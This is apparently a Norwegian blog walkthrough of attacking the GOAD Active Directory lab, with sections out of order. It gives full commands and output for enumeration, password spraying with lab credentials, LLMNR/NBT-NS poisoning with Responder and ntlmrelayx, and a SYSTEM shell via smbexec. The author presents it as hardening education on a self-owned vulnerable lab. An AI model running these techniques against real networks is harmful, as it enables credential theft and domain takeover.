Som vi ser er hodor:hodor akseptert på winterfell og castelblack, men på braavos har vi kun gjestetilgang, fordi han eksisterer ikke i essos\ domenet.
Tidligere fikk vi også et hint om at NORTH\arya.stark sitt passord kanskje kunne være “Needle”.
$netexecsmb--shares10.3.2.10-30-u"arya.stark"-p"Needle"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\arya.stark:Needle STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\arya.stark:Needle SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\arya.stark:Needle SMB10.3.2.23445BRAAVOS [+] essos.local\arya.stark:Needle (Guest)SMB10.3.2.12445MEEREEN [-] essos.local\arya.stark:Needle STATUS_LOGON_FAILURE SMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ RemoteAdminSMB10.3.2.11445WINTERFELLC$ DefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREADLogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREADLogonservershareSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersSMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi ser at vi igjen får tilgang til castelblack og winterfell med north\arya.stark og passordet “Needle”, men her får vi også tilgang til Braavos serveren i essos.local som essos\arya.stark, istedenfor som gjest denne gangen.
Fra rekognoseringen i forrige bloggpost kunne vi også lese i beskrivelsen til Samwell Tarly at passordet skulle være Heartsbane. Vi prøver det også:
$netexecsmb--shares10.3.2.10-30-u"samwell.tarly"-p"Heartsbane"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.12445MEEREEN [-] essos.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [+] essos.local\samwell.tarly:Heartsbane (Guest)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane SMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersSMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ RemoteAdminSMB10.3.2.11445WINTERFELLC$ DefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREADLogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREADLogonservershareSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Prøver vi samme metoden med robb.stark og sexywolfy får vi et svært lovende resultat:
$netexecsmb--shares10.3.2.10-30-u"robb.stark"-p"sexywolfy"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB10.3.2.12445MEEREEN [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [+] essos.local\robb.stark:sexywolfy (Guest)SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:sexywolfy SMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersSMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)SMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ READ,WRITERemoteAdminSMB10.3.2.11445WINTERFELLC$ READ,WRITEDefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREAD,WRITELogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREAD,WRITELogonservershareRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi har altså full admintilgang på Winterfell DCen allerede nå, men vi skal se på et par ting til før vi gir oss med initial access temaet.
Det første jeg vil demonstrere er hvordan vi kan lete etter informasjon i bl.a. gruppepolicy.
Tar vi utgangspunkt i tilgangen vi får med bare hodor:hodor kan vi f.eks se at vi har leserettigheter på SYSVOL og NETLOGON filområdene på domenekontrolleren.
Her har vi altså et powershell script, som definerer noen variabler. Den tar inn et passord, konverterer det med nøkkeldata, og lagrer et kryptert passord.
Vi kan prøve å reversere prosessen ved å ta det krypterte passordet, og dekryptere det med nøkkeldataene som ligger i scriptet.
Vi har altså en ukjent bruker, signert “T.L”, med passord powerkingftw135
NTLM Relay
Fordi vi ikke klarte å knekke passordet til Eddard Stark, så skal vi prøve å logge inn uten å kunne passordet. Dette angrepet kalles et NTLM Relay angrep.
Først har vi behov for en liste med verter som ikke krever SMB-signering, slik at vi kan forfalske opphavet til en autentiseringsforespørsel.
$netexecsmb10.3.2.10-30--gen-relay-listntlmrelay.netexecSMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)Runningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi sjekker innholdet i filen ntlmrelay.netexec, og ser at 10.3.2.22 og 10.3.2.23 er sårbare.
$catntlmrelay.netexec10.3.2.2210.3.2.23
Vi ønsker å bruke Responder sammen med NTLMRelayX for å utføre dette angrepet, så vi setter opp NTLMRelayX slik at det lagrer sesjoner i en SOCKS proxy for oss.
$ntlmrelayx.py-socks-smb2support-tf./ntlmrelay.netexec[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client MSSQL loaded..[*] Protocol Client SMB loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client RPC loaded..[*] Running in relay mode to hosts in targetfile[*] SOCKS proxy started. Listening on 127.0.0.1:1080[*] IMAP Socks Plugin loaded..[*] LDAPS Socks Plugin loaded..[*] SMTP Socks Plugin loaded..[*] LDAP Socks Plugin loaded..[*] HTTPS Socks Plugin loaded..[*] MSSQL Socks Plugin loaded..[*] HTTP Socks Plugin loaded..[*] IMAPS Socks Plugin loaded..[*] SMB Socks Plugin loaded..[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80*ServingFlaskapp'impacket.examples.ntlmrelayx.servers.socksserver'*Debugmode:off[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay enabled[*] Servers started, waiting for connections
NTLMRelayX er oppe, og klar til å relaye mot de sårbare vertene, og til å lagre sesjonene i en SOCKS proxy vi kan benytte oss av. For å benytte dem må vi sette opp proxychains til å bruke den.
$sudonano/etc/proxychains4.confsocks4127.0.0.11080#Legges til på slutten av fila.
Vi må også slå av SMB poisoning i responder, ettersom vi ønsker å videresende forespørselen.
$sudonano/etc/responder/Responder.conf# Påse at følgende innstillinger er satt:;PoisonerstostartMDNS=OnLLMNR=OnNBTNS=On;ServerstostartSMB=Off
Da kan vi forsøke å forgifte LLMNR, NetBios og mDNS forespørsler på nettverket, i håp om å lure Eddard Stark til å la oss videresende hans NTLMv2 hash til Castelblack og til Braavos serverene på nettverket.
Det går litt tid og så får vi se følgende, omtrent samtidig i responder og i ntlmrelayx:
# Responder[*][NBT-NS] Poisoned answer sent to 10.3.2.11 for name MEREN (service:FileServer)[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][NBT-NS] Poisoned answer sent to 10.3.2.11 for name BRAVOS (service:FileServer)[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
# NTLMRelayX[][*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.22[*] Authenticating against smb://10.3.2.22 as NORTH/EDDARD.STARK SUCCEED[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy[][*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.23[*] Authenticating against smb://10.3.2.23 as NORTH/EDDARD.STARK SUCCEED[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy[*] All targets processed![*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-33 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-34 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-35 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-36 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-37 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-38 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-39 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
Vi har altså snappet opp sesjoner for Eddard og Robb stark, og klart å etablere en sesjon på vegne av Eddard Stark mot begge serverene, og vi ser han er administrator på 10.3.2.22 som er Castelblack serveren.
Vi kjører smbexec.py via den etablerte sesjonen over proxychains, og ser at vi har fått tilgang som NT Authority\SYSTEM på castelblack serveren.
$proxychains4-qsmbexec.pyNORTH/[email protected]Password:# bare tomt passord her, bare trykk enter.[!] Launching semi-interactive shell - Careful what you executeC:\Windows\system32>whoamintauthority\systemC:\Windows\system32>hostnamecastelblack
Vi har altså et shell på maskinen som SYSTEM og kan egentlig gjøre hva vi har lyst til å gjøre på den maskinen, for eksempel å legge til en administratorkonto vi selv kontrollerer, skru av defender og installere skadevare, eller mange andre ting.
I neste post skal vi ta for oss hvordan vi kan innhente oss rundt i miljøet, og tilegne oss høyere og høyere tilgang.
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
Miljøet ble satt opp på IP range 10.3.2.0/24, og jeg vet at de fikk IPer i range .10–.23 dermed vet jeg at jeg kan fokusere på kartlegging i den addresseserien.
Fordi dette er en lab jeg kontrollerer selv, og den er skapt for å være sårbar, så bryr jeg meg ikke om å være usynlig.
NMAP
Noe av det aller første man ønsker å gjøre er å finne ut hva som er tilstede på nettverket, og hvilke tjenester som kjøres på disse boksene. I den sammenheng bruker jeg NMAP.
$nmap-sC-sV10.3.2.10-30StartingNmap7.95 ( https://nmap.org ) at 2025-08-25 12:21 EDT
Vi ser 5 verter på nettverket:
10.3.2.10, 10.3.2.11, 10.3.2.12 (DCer)
10.3.2.22, 10.3.2.23 (Andre servere)
Vi ser en del saftig informasjon på f.eks verten 10.3.2.22:
Vi kan se at bl.a. portene 135/tcp (RPC Mapper), 445/tcp (SMB), 3389/tcp (Remote Desktop), og 5985/tcp (WinRM) er åpne på verten 10.3.2.22
Legg også merke til SSL-Cert subject: castelblack.north.sevenkingdoms.local, dette kan være relevant informasjon, da det gir oss øyeblikkelige hint om domenestruktur og vertsnavn.
Enum4linux
Vi tester verktøyet enum4linux for å se om vi kan finne noe mer spennende på noen av serverene. Winterfell.north.sevenkingdoms.local gir oss mye informasjon.
Legg særlig merke til domeneinformasjon, brukerliste og passordpolicy.
Domeneinformasjon:
==================================( GettingdomainSIDfor10.3.2.11 )==================================DomainName:NORTHDomainSid:S-1-5-21-88918170-2512471535-2376777965[+] Host is part of a domain (notaworkgroup)
Brukerliste:
=========================================( Userson10.3.2.11 )=========================================index:0x18acRID:0x456acb:0x00000210Account:arya.starkName: (null) Desc: Arya Stark index:0x18bcRID:0x45bacb:0x00010210Account:brandon.starkName: (null) Desc: Brandon Starkindex:0x16f5RID:0x1f5acb:0x00000215Account:GuestName: (null) Desc: Built-in account for guest access to the computer/domainindex:0x18c0RID:0x45dacb:0x00000210Account:hodorName: (null) Desc: Brainless Giantindex:0x18c6RID:0x460acb:0x00000210Account:jeor.mormontName: (null) Desc: Jeor Mormontindex:0x18c3RID:0x45eacb:0x00040210Account:jon.snowName: (null) Desc: Jon Snowindex:0x18bfRID:0x45cacb:0x00000210Account:rickon.starkName: (null) Desc: Rickon Starkindex:0x18c4RID:0x45facb:0x00000210Account:samwell.tarlyName: (null) Desc: Samwell Tarly (Password:Heartsbane)index:0x18bbRID:0x45aacb:0x00000210Account:sansa.starkName: (null) Desc: Sansa Starkindex:0x18c9RID:0x461acb:0x00000210Account:sql_svcName: (null) Desc: sql service
Passordpolicy:
=============================( PasswordPolicyInformationfor10.3.2.11 )=============================[+] Attaching to 10.3.2.11 using a NULL share[+] Trying protocol 139/SMB...[!]Protocolfailed:Cannotrequestsession (Called Name:10.3.2.11)[+] Trying protocol 445/SMB...[+] Found domain(s):[+]NORTH[+]Builtin[+] Password Info for Domain: NORTH[+]Minimumpasswordlength:5[+]Passwordhistorylength:24[+]Maximumpasswordage:311days2minutes[+]PasswordComplexityFlags:000000[+]DomainRefusePasswordChange:0[+]DomainPasswordStoreCleartext:0[+]DomainPasswordLockoutAdmins:0[+]DomainPasswordNoClearChange:0[+]DomainPasswordNoAnonChange:0[+]DomainPasswordComplex:0[+]Minimumpasswordage:1day4minutes[+]ResetAccountLockoutCounter:5minutes[+]LockedAccountDuration:5minutes[+]AccountLockoutThreshold:5[+]ForcedLogoffTime:NotSet[+] Retieved partial password policy with rpcclient: PasswordComplexity:DisabledMinimumPasswordLength:5
Med disse opplysningene har vi en liste med brukere i NORTH\ og opplysninger om at det er mulig å ha passord som er helt nede i 5 tegn lengde, og at de ikke har noen kompleksitetskrav. Vi har også fått beskjed om at passordet til Samwell Tarly er ‘Heartsbane’.
Netexec
Jeg ser om jeg kan finne noen tilgjengelige fileshares på området med netexec, som har i økende grad begynt å erstatte crackmapexec.
Her benytter jeg spesifikt smb modulen i netexec, og spesifiserer brukernavn “Guest” og et blankt passord for å se om gjestetilgang er tillatt. Dette gjør jeg for å vise at vi kan hente informasjon selv før vi har funnet brukernavn/passord i denne laben.
$netexecsmb--shares10.3.2.10-30-u""-p""SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\:SMB10.3.2.11445WINTERFELL [-] Error enumerating shares: STATUS_ACCESS_DENIEDSMB10.3.2.10445KINGSLANDING [+] sevenkingdoms.local\:SMB10.3.2.10445KINGSLANDING [-] Error enumerating shares: STATUS_ACCESS_DENIEDSMB10.3.2.22445CASTELBLACK [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED SMB10.3.2.22445CASTELBLACK [-] Error enumerating shares: Error occurs whilereadingfromremote(104)SMB10.3.2.23445BRAAVOS [-] essos.local\: STATUS_ACCESS_DENIED SMB10.3.2.23445BRAAVOS [-] Error enumerating shares: Error occurs whilereadingfromremote(104)SMB10.3.2.12445MEEREEN [+] essos.local\:SMB10.3.2.12445MEEREEN [-] Error enumerating shares: STATUS_ACCESS_DENIEDRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi har lokalisert /all filesharen på både CASTELBLACK og BRAAVOS serverene. Kanskje vi kan finne noe spennende der? Vi ser også at Braavos og Castelblack ikke krever SMB Signing, og at både Braavos og Meereen støtter SMBv1.
/etc/hosts
Vi oppdaterer /etc/hosts med informasjon samlet fra enum4linux og netexec:
Vi oppdaget et dokument som heter arya.txt – dette kan være interessant, så vi laster det ned og ser på innholdet.
$catarya.txtSubject:QuickDepartureHeyArya,Ihopethismessagefindsyouwell.Somethingurgenthascomeup,andIhavetoleaveforawhile.Don't worry; I'llbebacksoon.Ileftalittlesurpriseforyouinyourroom–theswordYou've named "Needle." It felt fitting, given your skills. Take care of it, and it'lltakecareofyou.I'll explain everything when I return. Until then, stay sharp, sis.Best,John
Som vi ser er det et potensielt passordhint i dokumentet. “Needle”. Dette kan være nyttig i fremtiden.
Denne bloggen kommer til å handle om identitetssikring, primært i windows-miljøer, så det går mye i AD og Entra.
Som mitt første blogginnlegg her ønsker jeg å se nærmere på veldig vanlige feilkonfigurasjoner og sårbarheter i Windows Active Directory, som kan føre til total kompromittering av et AD-miljø.
Det er ikke slik at jeg ønsker å lære bort disse teknikkene så folk skal misbruke dem, men heller å demonstrere hvor sårbare mange er uten å vite det, og oppfordre dem til å herde miljøene sine.
Fremtidige blogginnlegg vil ta for seg konkrete steg man kan ta for å herde spesifikke angrepsflater, og vil referere tilbake til denne første serien for å vise hvorfor det er viktig å gjøre disse tiltakene.
Målet blir å ta seg fra en kali linux maskin på samme subnet, til totalt eierskap over rubbel og bit i labben.
Labmiljøet settes opp via automasjonsprogramvaren Vagrant og Ansible, og kan være litt vanskelig å komme i gang med, da automatikken ikke alltid fungerer helt som den skal, så vær obs på det dersom du skal begi deg ut på samme laboppgavene.
Labben som er valgt er den vanligste – GOAD, som innebærer 5 virtuelle maskiner, 2 AD skoger med 3 domener totalt.
Jeg har løst labben en gang før, og gikk inn blindt den gang, men på github repoet finner man en oversikt over alle angrepsmetodene som skal virke. Med viten og vilje har jeg unngått å lese denne, da jeg ønsker å utforske det selv.
